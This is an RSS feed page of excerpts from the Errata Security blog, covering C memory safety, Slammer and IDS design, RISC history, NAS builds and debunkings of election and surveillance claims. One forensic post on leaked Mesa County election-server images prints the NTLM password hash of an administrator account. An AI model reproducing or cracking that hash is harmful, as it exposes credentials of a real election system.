www.secnews.physaphae.fr This is the RSS 2.0 feed from www.secnews.physaphae.fr. It's a simple aggregated feed of multiple article sources. The list of sources can be found on www.secnews.physaphae.fr. 2024-05-02T21:48:31+00:00 www.secnews.physaphae.fr

Errata Security - Errata Security

C can be memory safe, part 2

This post from last year was submitted to a forum, so I thought I'd write up some rebuttals to the comments. The first comment is by David Chisnall, creator of CHERI C/C++, who proposes that we can instead solve the problem with CPU instruction-set extensions. It's a good idea, but after 14 years, CPUs haven't had their instruction sets upgraded this way. Even the newly created RISC-V processors have been designed without such extensions.

Chisnall: "If your safety requires you to insert explicit checks, it's not safe." That's true from one point of view, false from another. My proposal includes compilers spitting out warnings whenever bounds information doesn't exist. C is full of problems in theory that don't exist in practice, because the compiler spits out warnings telling programmers to fix the problem. Warnings can also flag cases where programmers have likely made mistakes. We can't get perfect guarantees, because programmers can still make mistakes, but we can certainly achieve "good enough".

Chisnall: ...thread safety... I'm not sure I understand the comment. I understand that CHERI can guarantee the atomicity of a bounds check, which would otherwise require multiple (interruptible) instructions. The number of cases where this is a problem is small, and the C proposal would be no worse than other languages like Rust.

Chisnall: temporal safety...
Many of Rust's "ownership" techniques can be applied to C with these annotations, namely, marking which variables own an allocated chunk of memory and which merely borrow it. I've reviewed many famous use-after-free and double-free bugs, and most can be trivially fixed by annotation.

Chisnall: If you write a blog post like this but have never tried to make a large (million lines or more) C codebase memory safe, you probably underestimate the difficulty by at least an order of magnitude.

I'm both a programmer who has written a million lines of code in my life and a hacker with decades of experience hunting for such bugs. The goal isn't to pursue the ideal of a 100% safe language, but to get rid of 99% of the safety errors. Being 1% less safe makes the goal an order of magnitude easier to reach.

snej: This post seems to embody the common engineer trait of seeing any problem you haven't personally worked on as trivial. Sure, bro, you add a few patches to Clang and GCC and with these new attributes our C code will be safe. It'll only take a few weeks and nobody will need Rust anymore.

But I've spent decades working on this. The comment embodies the common trait of not realizing how much thought and expertise lies behind a post. I do think a few patches to Clang and GCC will make C safer. The solution is still much less safe than Rust. In fact, my proposal makes code more interoperable with, and translatable into, Rust. Right now, translating C to Rust just creates a bunch of 'unsafe' code that has to be cleaned up. With such annotations, plus a refactoring step using existing test frameworks, the result is code that can be automatically and safely ported to Rust.
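A minimal sketch of what such ownership annotations might look like in C. The OWNS/BORROWS names are invented for illustration (the post doesn't specify a syntax); here they expand to nothing, but a compiler implementing the proposal could use them to warn about double-free and use-after-free.

```c
#include <stdlib.h>
#include <string.h>

#define OWNS     /* hypothetical: this pointer owns its allocation */
#define BORROWS  /* hypothetical: this pointer merely borrows it */

/* A borrower: reads the buffer but is not responsible for freeing it. */
static size_t measure(BORROWS const char *s)
{
    return strlen(s);
}

static size_t demo(void)
{
    OWNS char *buf = malloc(16);   /* buf owns the allocation */
    if (buf == NULL)
        return 0;
    strcpy(buf, "hello");
    size_t n = measure(buf);       /* lend it out; ownership stays here */
    free(buf);                     /* the owner frees, exactly once */
    return n;
}
```

With annotations like these, a second `free(buf)` or a use of `buf` after the `free()` is something the compiler can flag mechanically, which is the "trivially fixed by annotation" claim above.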
As for existing Clang/GCC attributes, there are only a couple that correspond to the macros I propose…

2024-02-14T17:30:42+00:00 https://blog.erratasec.com/2024/02/c-can-be-memory-safe-part-2.html

C can be memory-safe

…fixed it by first adding a memory-bounds, then putting every access to the memory behind a macro PUSHC() that checks the memory-bounds. A better (but currently hypothetical) fix would be something like the following:

size_t maxsize CHK_SIZE(outptr) = out ? *outlen : 0;

This would link the memory-bounds maxsize with the memory outptr. The compiler can then be relied upon to do all the bounds checking to prevent buffer overflows; the rest of the code wouldn't need to be changed.

An even better (and hypothetical) fix would be to change the function declaration like the following:

int ossl_a2ulabel(const char *in, char *out, size_t *outlen CHK_INOUT_SIZE(out));

That's the intent anyway: that *outlen is the memory-bounds of out on input, and receives a shorter bounds on output.

This specific feature isn't in compilers. But gcc and clang already have other similar features; they've only been halfway implemented. This feature would be relatively easy to add. I'm currently studying the code to see how I can add it myself. I could mostly copy what's done for the alloc_size attribute. But there's a considerable learning curve, so I'd rather just persuade an existing developer of gcc or clang to add the new attributes for me.

Once you give the programmer the ability to fix memory-safety problems like the solution above, you can then enable warnings for unsafe code. The compiler knew the above code was unsafe, but since there was no practical way to fix it, it would have been pointless to nag the programmer about it. With this new feature come warnings about failing to use it.

In other words, it becomes compiler-guided refactoring.
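The PUSHC() idea mentioned above can be sketched in a few lines. This is my reconstruction for illustration, not the actual OpenSSL patch: the macro checks the remaining bounds before every store, returning an error instead of overflowing.

```c
#include <stddef.h>

/* Hypothetical sketch of the PUSHC() approach: every write to the
 * output buffer goes through a macro that checks the bounds first.
 * The enclosing function returns -1 if the buffer would overflow. */
#define PUSHC(buf, len, max, c)              \
    do {                                     \
        if ((len) >= (max)) return -1;       \
        (buf)[(len)++] = (c);                \
    } while (0)

/* Copy a string into out[], never writing past maxsize bytes. */
static int bounded_copy(char *out, size_t maxsize, const char *in)
{
    size_t len = 0;
    while (*in)
        PUSHC(out, len, maxsize, *in++);
    PUSHC(out, len, maxsize, '\0');  /* terminator is bounds-checked too */
    return 0;
}
```

The point of the proposal is that once the bounds are linked to the pointer by annotation, the compiler inserts these checks itself, and the explicit macro disappears.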
Forking code is hard, refactoring is easy. As the above function shows, the OpenSSL code is already somewhat memory safe, just based upon the flawed principle of relying upon diligent programmers. We need the compi…

2023-02-01T13:30:40+00:00 https://blog.erratasec.com/2023/02/c-can-be-memory-safe.html

I'm still bitter about Slammer

…NAPI drivers. The problem with interrupts is that a computer of that era could handle fewer than 50,000 interrupts per second. If network traffic arrived faster than that, the computer would hang, spending all its time in the interrupt handler and doing no other useful work. By turning off interrupts and instead polling for packets, this problem is prevented. The cost is that when the computer isn't heavily loaded with network traffic, polling wastes CPU and electrical power. Linux NAPI drivers switch between the two: interrupts when traffic is light, polling when traffic is heavy.

The consequence was that a typical machine of the time (dual Pentium IIIs) could handle 2 million packets per second running my software, far better than the 50,000 packets per second of the competitors.

When Slammer hit, it filled a 1-gbps Ethernet link with 300,000 packets per second. As a consequence, pretty much all the other IDS products fell over. Those that survived were attached to slower links -- 100-mbps was still common at the time.

An industry luminary even gave a presentation at BlackHat saying that my claimed performance (2 million packets per second) was impossible, because everyone knew computers couldn't handle traffic that fast. I couldn't combat that, even by explaining with very small words "but we disable interrupts".

Now this is the norm. All network drivers are written with polling in mind. Specialized drivers like PF_RING and DPDK do even better. Network appliances are now written using these things.
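The interrupt-versus-polling tradeoff described above can be sketched as follows. This is a toy simulation, not the actual Linux NAPI API: the ring and the budget value are invented for illustration, but the shape is the same -- drain up to a fixed budget of packets per poll pass instead of taking one interrupt per packet.

```c
#define POLL_BUDGET 64            /* packets processed per poll pass */

static int ring_count;            /* simulated ring: packets waiting */

/* Pull the next packet off the ring, or -1 if the ring is empty. */
static int ring_next(void)
{
    return ring_count > 0 ? ring_count-- : -1;
}

/* NAPI-style poll: process packets until the ring is empty (then the
 * driver would re-enable interrupts) or the budget is exhausted (then
 * it stays in polling mode for another pass). */
static int napi_poll(void)
{
    int handled = 0;
    while (handled < POLL_BUDGET) {
        int pkt = ring_next();
        if (pkt < 0)
            break;                /* ring empty: back to interrupt mode */
        /* process_packet(pkt) would go here */
        handled++;
    }
    return handled;
}
```

Under heavy load each pass amortizes one scheduling decision over dozens of packets, which is why polling survives packet rates that per-packet interrupts cannot.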
Now you'd expect something like Snort to keep up and not get overloaded with interrupts. What makes me bitter is that back then, this was inexplicable magic. I wrote an article in PoC||GTFO 0x15 that shows how my portscanner masscan uses this driver, if you want more info.

The second difference with my product was how signatures were written. Everyone else used signatures that triggered on pattern-matching. Instead, my technology included protocol analysis: code that parsed more than 100 protocols.

The difference is that when there's an exploit of a buffer-overflow vulnerability, pattern-matching searches for patterns unique to that exploit. In my case, we'd measure the length of the buffer, triggering when it exceeded a certain length, finding any attempt to attack the vulnerability.

The reason we could do this was through the use of state-machine parsers. Such analysis was considered heavyweight and slow, which is why others avoided it. In fact, state-machines are faster than pattern-matching, many times faster. Better and faster.

Such parsers are no…

2023-01-25T16:09:34+00:00 https://blog.erratasec.com/2023/01/im-still-bitter-about-slammer.html

The RISC Deprogrammer

…this recent blogpost, which starts out saying that "RISC is a set of design principles". No, it wasn't. Let's start from this sort of viewpoint to discuss this odd cult.

What is RISC?

Because of the march of Moore's Law, every year more and more parts of a computer could be included on a single chip. When chip densities reached the point where we could almost fit an entire computer on a chip, designers made tradeoffs, discarding unimportant stuff to make the fit happen.
They made tradeoffs, deciding what needed to be included, what needed to change, and what needed to be discarded. RISC is a set of creative tradeoffs, meaningful at the time (the early 1980s), but which were meaningless by the late 1990s.

The interesting part of CPU evolution is the four decades between 1964, with IBM's System/360 mainframe, and 2007, with Apple's iPhone. The defining feature was a 32-bit core with memory protection, allowing isolation among different programs, with virtual memory. These were real computers, from the modern perspective: real computers have at least 32 bits and an MMU (memory management unit).

The year 1975 saw the release of the Intel 8080 and MOS 6502, but these were 8-bit systems without memory protection. This was the point of Moore's Law where we could get a useful CPU onto a single chip.

In 1977 we saw DEC release its VAX minicomputer, having a 32-bit CPU with MMU. Real computing had moved from insanely expensive mainframes filling entire rooms to less expensive devices that merely filled a rack. But the VAX was way too big to fit onto a chip at this time.

The really interesting evolution of real computing happened in 1980 with Motorola's 68000 (aka 68k) processor, essentially the first microprocessor that supported real computing.

But this comes with caveats. Making a microprocessor required creative work to decide what wasn't included. In the case of the 68k, it had only a 16-bit ALU. This meant adding two 32-bit registers required passing them through the ALU twice, adding each half separately. Because of this, many call the 68k a 16-bit rather than a 32-bit microprocessor.

More importantly, only the lower 24 bits of the registers were valid for memory addresses. Since it's memory addressing that makes a real computer "real", this is the more important measure. But 24 bits allows for 16 megabytes of memory, which is all anybody could afford to include in a computer anyway. It was more than enough to run a real operating system like Unix.
In contrast, 16-bit processors could only address 64 kilobytes of memory, and weren't really practical for real computing.

The 68k didn't come with an MMU, but it allowed an extra MMU chip. Thus, the early 1980s saw an explosion of workstations and servers consisting of a 68k plus an MMU. The most famous was Sun Microsystems, launched in 1982, with its own custom-designed MMU chip.

Sun and its competitors transformed the industry by running Unix. Many point to the IBM PC from 1981 as the transformative moment in computer history, but those were non-real 16-bit systems that struggled with more than 64k of memory. IBM PC computers wouldn't become real until 1993 with Microsoft's Windows NT, supporting full 32 bits, memory protection, and pre-emptive multitasking.

But except for Windows itself, the rest of computing is dominated by the Unix heritage. The phone in your hand, whether Android or iPhone, is a Unix compu…

2022-10-23T16:05:58+00:00 https://blog.erratasec.com/2022/10/the-risc-deprogrammer.html

DS620slim tiny home server

In this blogpost, I describe the Synology DS620slim. Mostly these are notes for myself, so when I need to replace something in the future, I can remember how I built the system. It's a "NAS" (network attached storage) server that has six hot-swappable bays for 2.5 inch laptop drives.

That's right, laptop 2.5 inch drives. It makes this a tiny server that you can hold in your hand.

The purpose of a NAS is reliable storage. All disk drives eventually fail. If you stick a USB external drive on your desktop for backups, it'll eventually crash, losing any data on it. A failure is unlikely tomorrow, but a spinning disk will almost certainly fail some time in the next 10 years.
If you want to keep things, like photos, for the rest of your life, you need to do something different.

The solution is RAID, an array of redundant disks such that when one fails (or even two), you don't lose any data. You simply buy a new disk to replace the failed one and keep going. With occasional replacements (as failures happen) it can last decades. My older NAS is 10 years old and I've replaced all the disks, one slot twice.

This can be expensive. A NAS requires a separate box in addition to lots of drives. In my case, I'm spending $1500 for 18 terabytes of disk space that would cost only $400 as an external USB drive. But amortized over the expected 10+ year lifespan, I'm paying $15/month for this home system.

This unit is not just disk drives but also a server. Spending $500 just for a box to hold the drives is a bit expensive, but the advantage is that it's also a server that's powered on all the time. I can set up tasks to run on a regular basis that would break if I tried to run them regularly on a laptop or desktop computer.

There are lots of do-it-yourself solutions (like the Radxa Taco carrier board for a Raspberry Pi CM4 running Linux), but I'm choosing this solution because I want something that just works without any hassle, configured for exactly what I need. For example, eventually a disk will fail and I'll have to replace it, and I know now that this will be effortless when it happens in the future, without having to relearn some arcane Linux commands that I forgot years ago.

Despite this, I'm a geek who obsesses about things, so I'm still going to do possibly unnecessary things, like upgrading hardware: memory, network, and fan for an optimized system.
Here are all the components of my system:

$500 - DS620slim unit
$1000 - 6x Seagate Barracuda 5TB 2.5 inch laptop drives (ST5000LM000)
$100 - 2x Crucial 8GB DDR3 SODIMMs (CT2K102464BF186D)
$30 - 2.5gbps Ethernet USB adapter (CableCreation B07VNFLTLD)
$15 - Noctua NF-A8 ULN ultra-silent fan
$360 - WD Elements 18TB USB drive (WDBWLG0180HBK-NESN)

2022-07-03T19:02:22+00:00 https://blog.erratasec.com/2022/07/ds620slim-tiny-home-server.html

No, a researcher didn't find Olympics app spying on you

…CitizenLab documents. However, another researcher goes further, claiming his analysis proves the app is recording all audio all the time. His analysis is fraudulent. He shows a lot of technical content that looks plausible, but nowhere does he show anything that substantiates his claims.

Average techies may not be able to see this. It all looks technical. Therefore, I thought I'd describe one example of the problems with this data -- something the average techie can recognize.

His "evidence" consists of screenshots from reverse-engineering tools, with red arrows pointing to the suspicious bits. An example of one of these screenshots is this one:

This screenshot is from a reverse-engineering tool (Hopper, I think) that takes code and "disassembles" it. When you dump something into a reverse-engineering tool, it'll make a few assumptions about what it sees. These assumptions are usually wrong. There's a process where the human user looks at the analyzed output, does a "sniff test" on whether it looks reasonable, and works with the tool until it gets the assumptions correct.

That's the red flag above: the researcher has dumped the results of a reverse-engineering tool without recognizing that something is wrong in the analysis.

It fails the sniff test. Different researchers will notice different things first. Famed Google researcher Tavis Ormandy points out one flaw.
In this post, I describe what jumps out first to me. That would be the 'imul' (multiplication) instruction shown in the blowup below:

It's obviously ASCII. In other words, it's a series of bytes. The tool has tried to interpret these bytes as Intel x86 instructions (like 'and', 'insd', 'das', 'imul', etc.). But it's obviously not Intel x86, because those instructions make no sense.

That 'imul' instruction is multiplying something by the (hex) number 0x6b657479. That doesn't look like a number -- it looks like four lower-case ASCII letters. ASCII lower-case letters are in the range 0x61 through 0x7a, so it's not the single 4-byte number 0x6b657479 but the 4 individual bytes 6b 65 74 79, which map to the ASCII letters 'k', 'e', 't…

2022-01-31T15:33:58+00:00 https://blog.erratasec.com/2022/01/no-researcher-didnt-find-olympics-app.html

Journalists: stop selling NFTs that you don't understand

…(AP and NYTimes). They get important details wrong.

The latest is Reason.com magazine selling an NFT. As libertarians, you'd think at least they'd get the technical details right. But they didn't. Instead of selling an NFT of the artwork, it's just an NFT of a URL. The URL points to OpenSea, which is known to remove artwork from its site (such as in response to DMCA takedown requests).

If you buy that Reason.com NFT, what you'll actually get is a token pointing to:

https://api.opensea.io/api/v1/metadata/0x495f947276749Ce646f68AC8c248420045cb7b5e/0x1F907774A05F9CD08975EBF7BF56BB4FF0A4EAF0000000000000060000000001

This is just the metadata, which in turn contains a link to the claimed artwork:

https://lh3.googleusercontent.com/8Q2OGcPuODtCxbTmlf3epFGOqbfCbs4fXZ2RcIMnLpRdTaYHgqKArk7uETRdSZmpRAFsNE8KB4sFJx6czKE5cBKB1pa7ovc4wBUdqQ

If either OpenSea or Google removes the linked content, then any connection between the NFT and the artwork disappears.

It doesn't have to be this way.
The correct way to do an NFT of artwork is to point to a "hash" instead, which uniquely identifies the work regardless of where it's located. That $69 million Beeple piece was done this correct way. It's completely decentralized. If the entire Internet disappeared except for the Ethereum blockchain, that Beeple NFT would still work.

This is an analogy for the entire blockchain, cryptocurrency, and dapp ecosystem: the hype you hear ignores technical details. They promise an entirely decentralized economy controlled by math and code, rather than any human entities. In practice, almost everything cheats, being tied to humans controlling things. In this case, the "Reason.com NFT artwork" is under the control of OpenSea, not the "owner" of the token.

Journalists have a problem. NFTs selling for millions of dollars are newsworthy, and it's the journalist's place to report news rather than make judgments, like whether or not it's a scam. But at the same time, journalists are trying to explain things they don't understand. Instead of standing outside the story, simply quoting sources, they insert themselves into the story, becoming advocates rather than reporters. They can no longer be trusted as objective observers.

From a fraud perspective, it may not matter that the Reason.com NFT points to a URL instead of the promised artwork. The entire point of the blockchain is caveat emptor in action. Rules are supposed to be governed by code rather than companies, governments, or the courts. There is no undoing a transaction even if courts were to order it, because it's math.

But from a journalistic point of view, this is important. They failed at an honest description of what the NFT actually contains. They've involved themselves in the story, creating a conflict of interest.
It's now hard for them to point out NFT scams when they themselves have participated in something that, from a certain point of view, could be viewed as a scam.

2021-12-07T20:39:22+00:00 https://blog.erratasec.com/2021/12/journalists-stop-selling-nfts-that-you.html

Example: forensicating the Mesa County system image

…went rogue and dumped disk images of an election computer on the Internet. They are available on the Internet via BitTorrent [Mesa1][Mesa2]. The Colorado Secretary of State is now suing her over the incident.

The lawsuit describes the facts of the case: how she entered the building with an accomplice on Sunday, May 23, 2021. I thought I'd do some forensics on the image to get more details.

Specifically, I see from the Mesa1 image that she logged on at 4:24pm and was done acquiring the image by 4:30pm -- in and (presumably) out in under 7 minutes.

In this blogpost, I go into more detail about how to get that information.

The image

To download the Mesa1 image, you need a program that can access BitTorrent, such as the Brave web browser or a BitTorrent client like qBittorrent. Either click on the "magnet" link or copy/paste it into the program you'll use to download. It takes a minute to gather all the "metadata" associated with the link, but it'll soon start the download.

What you get is a file named EMSSERVER.E01. This is a container file that contains both the raw disk image as well as some forensics metadata, like the date it was collected, the forensics investigator, and so on. This container is in the well-known "EnCase Expert Witness" format.
EnCase is a commercial product, but its container format is a quasi-standard in the industry. Some freeware utilities you can use to open this container and view the disk include FTK Imager, Autopsy, and, on the Linux command line, ewf-tools.

However you access the E01 file, what you most want to look at is the Windows operating-system logs. These are located in the directory C:\Windows\System32\winevt\Logs. The standard Windows "Event Viewer" application can load these log files to help you view them.

When a USB drive is inserted to create the disk image, these event files are updated and written to the disk before the image is taken. Thus, we can see in the event files all the events that happened right before the disk image was made.

Disk image acquisition

Here's what the event logs on the Mesa1 image tell us about the acquisition of the disk image itself.

The person taking the disk image logged in at 4:24:16pm, directly to the console (not remotely), on their second attempt, after first typing an incorrect password. The account used was "emsadmin". Its NTLM password hash is 9e4ec70af42436e5f0abf0a99e908b7a. This is a "role-based" account rather than an individual's account, but I think Tina Peters is the person responsible for the "emsadmin" role.

Then, at 4:26:10pm, they connected via USB a Western Digital "easystore™" portable drive that holds 5 terabytes. This was mounted as the F: drive.

The program "AccessData FTK Imager 4.2.0.13" was run from the USB drive (F:\FTK Imager\FTK Imager.exe) in order to image the system. The image was taken around 4:30pm local Mountain Time (10:30pm GMT).

It's impossible to say from this image what happened after it was taken. Presumab…

2021-11-07T20:09:32+00:00 https://blog.erratasec.com/2021/11/example-forensicating-mesa-county.html

Debunking: that Jones Alfa-Trump report
In this blogpost, I debunk that report.

If you'll recall, the conspiracy-theory comes from anomalous DNS traffic captured by cybersecurity researchers. In the summer of 2016, while Trump was denying involvement with Russian banks, Alfa Bank in Russia was doing lookups on the name "mail1.trump-email.com". During this time, additional lookups were also coming from two other organizations with suspicious ties to Trump: Spectrum Health and Heartland Payments.

This is certainly suspicious, but people have taken it further. They have crafted a conspiracy-theory to explain the anomaly, namely that these organizations were secretly connecting to a Trump server.

We know this explanation to be false. There is no Trump server, no real server at all, and no connections. Instead, the name was created and controlled by Cendyn. The server the name points to is for transmitting bulk email and isn't really configured to accept connections. It's built for outgoing spam, not incoming connections. The Trump Org had no control over the name or the server. As Cendyn explains, the contract with the Trump Org ended in March 2016, after which they re-used the IP address for other marketing programs, but since they hadn't changed the DNS settings, this caused lookups of the DNS name.

This still doesn't answer why Alfa, Spectrum, Heartland, and nobody else were doing the lookups. That's still a question. But the answer isn't secret connections to a Trump server. The evidence is pretty solid on that point.

Daniel Jones and the Democracy Integrity Project

The report is from Daniel Jones and his Democracy Integrity Project.

It's at this point that things get squirrely. All sorts of right-wing sites claim he's a front for George Soros, funds Fusion GPS, and is involved in the Steele Dossier. That's right-wing conspiracy-theory nonsense.

But at the same time, he's clearly not an independent and objective analyst.
He was hired to further the interests of Democrats. If the data and analysis held up, then partisan ties wouldn't matter. But they don't hold up. Jones is clearly trying to be deceptive.

The deception starts with repeatedly referring to the "Trump server". There is no Trump server. There is a Listrak server operated on behalf of Cendyn. Whether the Trump Org had any control over the name or the server is a key question the report should be trying to prove, not a premise. The report clearly understands this fact, so it can't be considered a mere mistake, but a deliberate deception.

People assume that a domain name like "trump-email.com" would be controlled by the Trump organization. It wasn't. When Trump Hotels hired Cendyn to do marketing for them, Cendyn did what they normally do in such cases: register a domain with their client's name for the sending of bulk emails. They did the same thing with hyatt-email.com, denihan-email.com, mjh-email.com, and so on. What's clear is that the Trump organization had no control over, and no direct ties to, this domain until after the conspiracy-theory hit the press.

Finding #1 - Alfa Bank, Spectrum Health, and Heartland account for nearly all of the DNS lookups for mail1.trump-email.com in the May-September timeframe.

Yup, that's weird and unexplained. But the report concludes from this that there were connections, saying the following:

In the DNS environment, if "computer X" does a DNS look-up of "Computer Y," it means that "Computer X" is trying to connect to "Computer Y".

This is false. That's certain…

2021-10-31T01:54:29+00:00 https://blog.erratasec.com/2021/10/debunking-that-jones-alfa-trump-report.html

Review: Dune (2021)

…This is Villeneuve's trademark, which you can see in his other works, like his sequel to Blade Runner. The purpose is to marvel at the visuals in every scene.
The storytelling is just enough to hold the visuals together. I mean, he also seems to do a good job with the storytelling, but it's just not the reason to go see the movie. (I can't tell -- I've read the book, so I see the story differently than those of you who haven't.)

Beyond the story and visuals, many of the actors' performances were phenomenal. Javier Bardem's "Stilgar" character steals his scenes. Stellan Skarsgård exudes evil. The two character actors playing the mentats were each perfect. I found the lead character (Timothée Chalamet) a bit annoying, but simply because of where he is at this point in the story.

Villeneuve splits the book into two parts. This movie is only the first part. This presents a problem, because up until this point, the main character is just responding to events, not yet the hero who drives them. It doesn't fit into the traditional Hollywood accounting model. I really want to see the second film, even if the first part, released in the post-pandemic turmoil of the movie industry, doesn't perform well at the box office.

In short, if you haven't read the books, I'm not sure how well you'll follow the storytelling. But the visuals (seen at IMAX scale) and the characters are so great that I'm pretty sure most people will enjoy the movie. And go see it on IMAX in order to get the second movie made!!

2021-10-24T19:46:46+00:00 https://blog.erratasec.com/2021/10/review-dune.html

Fact check: that "forensics" of the Mesa image is crazy

…this "forensics" report. In this blogpost, I debunk that report.

I suppose calling somebody a "conspiracy theorist" is insulting, but there are three objective ways we can identify one as such.

The first is when they use the logic "everything we can't explain is proof of the conspiracy".
In other words, since there's no other rational explanation, the only remaining explanation is the conspiracy-theory. But there can be other possible explanations -- just ones unknown to the person, because they aren't smart enough to understand them. We see that here: the person writing this report doesn't understand some basic concepts, like "airgapped" networks.

This leads to the second way to recognize a conspiracy-theory: when it demands this one thing that'll clear everything up. Here, it's demanding that a manual audit/recount of Mesa County be performed. But it won't satisfy them. The Maricopa audit in neighboring Arizona, whose recount found no fraud, didn't clear anything up -- it just found more anomalies demanding more explanation. It's like Obama's birth certificate. The reason he ignored demands to show it was that, first, there was no serious question (even if born in Kenya, he'd still be a natural-born citizen -- just like how Cruz was born in Canada and McCain in Panama), and second, showing the birth certificate wouldn't change anything at all, as they'd just claim it was fake. There is no possibility of showing a birth certificate that can be proven isn't fake.

The third way to objectively identify a conspiracy-theory is when it repeats objectively crazy things. In this case, they keep demanding that the 2020 election be "decertified". That's not a thing. There is no regulation or law under which that can happen. The most you can hope for is to use this information to prosecute the fraudster, prosecute the elections clerk who didn't follow procedure, or convince legislators to change the rules for the next election. But there's just no way to change the results of the last election, even if widespread fraud were now proven.

The document makes 6 individual claims. Let's debunk them one-by-one.

#1 Data Integrity Violation

The report tracks some logs on how some votes were counted.
It concludes:If the reasons behind these findings cannot be adequately explained, then the county's election results are indeterminate and must be decertified.This neatly demonstrates two conditions I cited above. The analyst can't explain the anomaly not because something bad happened, but because they don't understand how Dominion's voting software works. This demand for an explanation is a common attribute of conspiracy theories -- the ignorant keep finding things they don't understand and demand somebody else explain them.Secondly, there's the claim that the election results must be "decertified". It's something that Trump and his supporters believe is a thing, that somehow the courts will overturn the past election and reinstate Trump. This isn't a rational claim. It's not how the courts or the law works or the Constitution works.#2 Intentional purging of Log FilesThis is the issue that convinced Tina Peters to go rogue, that the normal Dominion software update gets rid of all the old system-log files. She leaked two disk-images, before and after the update, to show the disappearance of system-logs. She believes this violates the law demanding the "election records" be preserved. She claims because o]]> 2021-10-13T23:33:07+00:00 https://blog.erratasec.com/2021/10/fact-check-that-forensics-of-mesa-image.html www.secnews.physaphae.fr/article.php?IdArticle=3512368 False Guideline None None Errata Security - Errata Security 100 terabyte home NAS Synology, QNAP, or Asustor. I'm a nerd, and I have setup my own Linux systems with RAID, but I'd rather get a commercial product. 
When a disk fails, and a disk will always eventually fail, then I want something that will loudly beep at me and make it easy to replace the drive and repair the RAID. Some choices you have are:
- vendor (Synology, QNAP, and Asustor are the vendors I know and trust the most)
- number of bays (you want 8 to 12)
- redundancy (you want at least 2 if not 3 disks)
- filesystem (btrfs or ZFS) [not btrfs-raid builtin, but btrfs on top of RAID]
- drives (NAS optimized between $20/tb and $30/tb)
- networking (at least 2-gbps bonded, but box probably can't use all of 10gbps)
- backup (big external USB drives)
The products I link above all have at least 8 drive bays. When you google "NAS", you'll get a list of smaller products. You don't want them. You want somewhere between 8 and 12 drives. The reason is that you want two-drive redundancy like RAID6 or RAIDZ2, meaning two additional drives. Everyone tells you one-disk redundancy (like RAID5) is enough; they are wrong. It's just legacy thinking, because it was sufficient in the past when drives were small. Disks are so big nowadays that you really need two-drive redundancy. If you have a 4-bay unit, then half the drives are used for redundancy. If you have a 12-bay unit, then only 2 out of the 12 drives are being used for redundancy. The next decision is the filesystem. There are only two choices, btrfs and ZFS. The reason is that they both support healing and snapshots. Note btrfs means btrfs-on-RAID6, not btrfs-RAID, which is broken. In other words, btrfs contains its own RAID feature that you don't want to use. Over long periods of time, errors creep into the file system. You want to scrub the data occasionally. This means reading the entire filesystem, checksumming the files, and repairing them if there's a problem. That requires a filesystem that checksums each block of data. You also want snapshots, to guard against things like ransomware.
This means you mark the files you want to keep, and even if a workstation attempts to change or delete the file, it'll still be held on the disk. QNAP uses ZFS while others like Synology and Asustor use btrfs. I really don't know which is better. It's cheaper to buy the NAS diskless, then add your own disk drives. If you can't do this, then you'll be helpless when a drive fails and needs to be replaced. Drives cost between $20/tb and $30/tb right now. This recent article has a good buying guide. You probably want to get a NAS-optimized hard drive. You probably want to double-check that it's CMR ("conventional" magnetic recording) instead of SMR ("shingled"). SMR is bad. There are only three hard drive makers (Seagate, Western Digital, and Toshiba), so there's not a big selection. Working with such large data sets over 1-gbps is painful. These units allow 802.3ad link aggregation as well as faster Ethernet. Some have 10gbe built-in; others allow a PCIe adapter to be plugged in. However, due to the overhead of spinning disks, you are unlikely to get 10gbps speeds. I mention this because 10gbps copper Ethernet sucks, so is not necessarily a buying criterion.
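The redundancy arithmetic from earlier -- why more bays waste proportionally less space on parity -- can be sketched in a few lines. This is a toy calculation; the 14tb drive size is just an example, and it ignores filesystem overhead and TB-vs-TiB marketing math:

```python
# Usable capacity with two-drive redundancy (RAID6/RAIDZ2),
# showing why more bays waste proportionally less space.
# The 14tb drive size is a hypothetical example, not a product spec.

def usable_tb(bays: int, drive_tb: int, parity_drives: int = 2) -> int:
    """Capacity left after setting aside the parity drives."""
    return (bays - parity_drives) * drive_tb

for bays in (4, 8, 12):
    total = bays * 14
    usable = usable_tb(bays, 14)
    print(f"{bays:2} bays: {total} tb raw, {usable} tb usable "
          f"({100 * usable // total}% efficient)")
```

A 4-bay unit gives up half its raw capacity to redundancy; a 12-bay unit gives up only a sixth, which is the argument for buying the bigger box.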
You may prefer multigig/NBASE-T that only does 5gbps with relaxed cabling requirements and lower power consumption.This means that your NAS decision is going to be made with your home networki]]> 2021-10-10T20:35:49+00:00 https://blog.erratasec.com/2021/10/100-terabyte-home-nas.html www.secnews.physaphae.fr/article.php?IdArticle=3497828 False None None None Errata Security - Errata Security Check: that Republican audit of Maricopa https://arizonaagenda.substack.com/p/we-got-the-senate-audit-reportThe three main problems are:They misapply cybersecurity principles that are meaningful for normal networks, but which don't really apply to the air gapped networks we see here.They make some errors about technology, especially networking.They are overstretching themselves to find dirt, claiming the things they don't understand are evidence of something bad.In the parts below, I pick apart individual pieces from that document to demonstrate these criticisms. I focus on section 7, the cybersecurity section, and ignore the other parts of the document, where others are more qualified than I to opine.In short, when corrected, section 7 is nearly empty of any content.7.5.2.1.1 Software and Patch Management, part 1They claim Dominion is defective at one of the best-known cyber-security issues: applying patches.It's not true. The systems are “air gapped”, disconnected from the typical sort of threat that exploits unpatched systems. The primary security of the system is physical.This is standard in other industries with hard reliability constraints, like industrial or medical. Patches in those systems can destabilize systems and kill people, so these industries are risk averse. They prefer to mitigate the threat in other ways, such as with firewalls and air gaps.Yes, this approach is controversial. There are some in the cybersecurity community who use lack of patches as a bludgeon with which to bully any who don't apply every patch immediately. 
But this is because patching is more a political issue than a technical one. In the real, non-political world we live in, most things don't get immediately patched all the time.7.5.2.1.1 Software and Patch Management, part 2They claim new software executables were applied to the system, despite the rules against new software being applied. This isn't necessarily true.There are many reasons why Windows may create new software executables even when no new software is added. One reason is “Features on Demand” or FOD. You'll see new executables appear in C:\Windows\WinSxS for these. Another reason is their .NET language, which causes binary x86 executables to be created from bytecode. You'll see this in the C:\Windows\assembly directory.The auditors simply counted the number of new executables, with no indication which category they fell in. Maybe they are right, maybe new software was installed or old software updated. It's just that their mere counting of executable files doesn't show understanding of these differences.7.5.2.1.2 Log ManagementThe auditors claim that a central log management system should be used.This obviously wouldn't apply to “air gapped” systems, because it would need a connection to an external network.Dominion already designates their EMSERVER as the central log repository for their little air gapped network. Important files from C: are copied to D:, a RAID10 drive. 
This is a perfectly adequate solution; adding yet another computer to their little network would be overkill, and would add as many security problems as it solved. One could argue more Windows logs need to be preserved, but that would simply mean archiving the logs from the C: drive onto the D: drive, not that you need to connect to the Internet to centrally log files.
